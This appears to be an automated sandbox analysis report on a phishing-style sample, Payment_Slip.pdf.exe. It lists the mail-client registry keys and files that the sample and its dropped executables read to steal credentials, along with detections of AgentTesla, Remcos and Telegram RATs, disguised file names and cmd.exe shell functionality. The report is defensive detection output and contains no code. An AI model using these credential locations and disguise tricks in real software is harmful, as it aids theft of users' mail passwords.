Source: C:\Users\user\AppData\Local\Temp\conserver.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Tries to steal Mail credentials (via file registry)
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: ESMTPPassword 15_2_004033E2
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 15_2_00402DA5
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 15_2_00402DA5
Yara detected WebBrowserPassView password recovery tool
Source: Yara match File source: Process Memory Space: Payment_Slip.pdf.exe PID: 6592, type: MEMORYSTR
Yara detected Credential Stealer
Source: Yara match File source: 0000001A.00000002.3620793390.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3619471195.0000000003002000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.3620793390.0000000002A12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3619471195.00000000030AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.1539307669.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.1539307669.0000000003232000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: host.exe PID: 4860, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: conserver.exe PID: 8164, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Windows Update.exe PID: 8368, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mykksg.exe PID: 8492, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Windows Update.exe PID: 8628, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mykksg.exe PID: 8792, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality
barindex
Detected Remcos RAT
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-TWFFFD Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-TWFFFD
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-TWFFFD
Yara detected AgentTesla
Source: Yara match File source: 12.0.host.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.conserver.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000000.1218959335.0000000000D72000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.1218869543.0000000000242000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\host.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\conserver.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe, type: DROPPED
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0000001B.00000002.3620392043.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.3621446588.0000000002578000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3622366959.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3619471195.0000000003002000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.3620793390.0000000002A12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.3621446588.0000000002597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3622366959.0000000002717000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.1539307669.0000000003232000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.3620392043.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: host.exe PID: 4860, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: conserver.exe PID: 8164, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Windows Update.exe PID: 8368, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mykksg.exe PID: 8492, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Windows Update.exe PID: 8628, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mykksg.exe PID: 8792, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Yara detected Remcos RAT
Source: Yara match File source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1205028524.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3614974815.0000000002ECF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3614283187.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1224623594.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.1223302187.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1251111243.000000000416F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1224421328.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Payment_Slip.pdf.exe PID: 8060, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Payment_Slip.pdf.exe PID: 7544, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mHTmhPhJy.exe PID: 7856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mHTmhPhJy.exe PID: 5392, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dwn.exe PID: 7300, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED
Yara detected Telegram RAT
Source: Yara match File source: 0000001B.00000002.3620392043.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.3621446588.0000000002597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3622366959.0000000002717000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: host.exe PID: 4860, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mykksg.exe PID: 8492, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mykksg.exe PID: 8792, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Contains functionality to launch a control a shell (cmd.exe)
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: cmd.exe 11_2_0040567A
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: cmd.exe 17_2_0040567A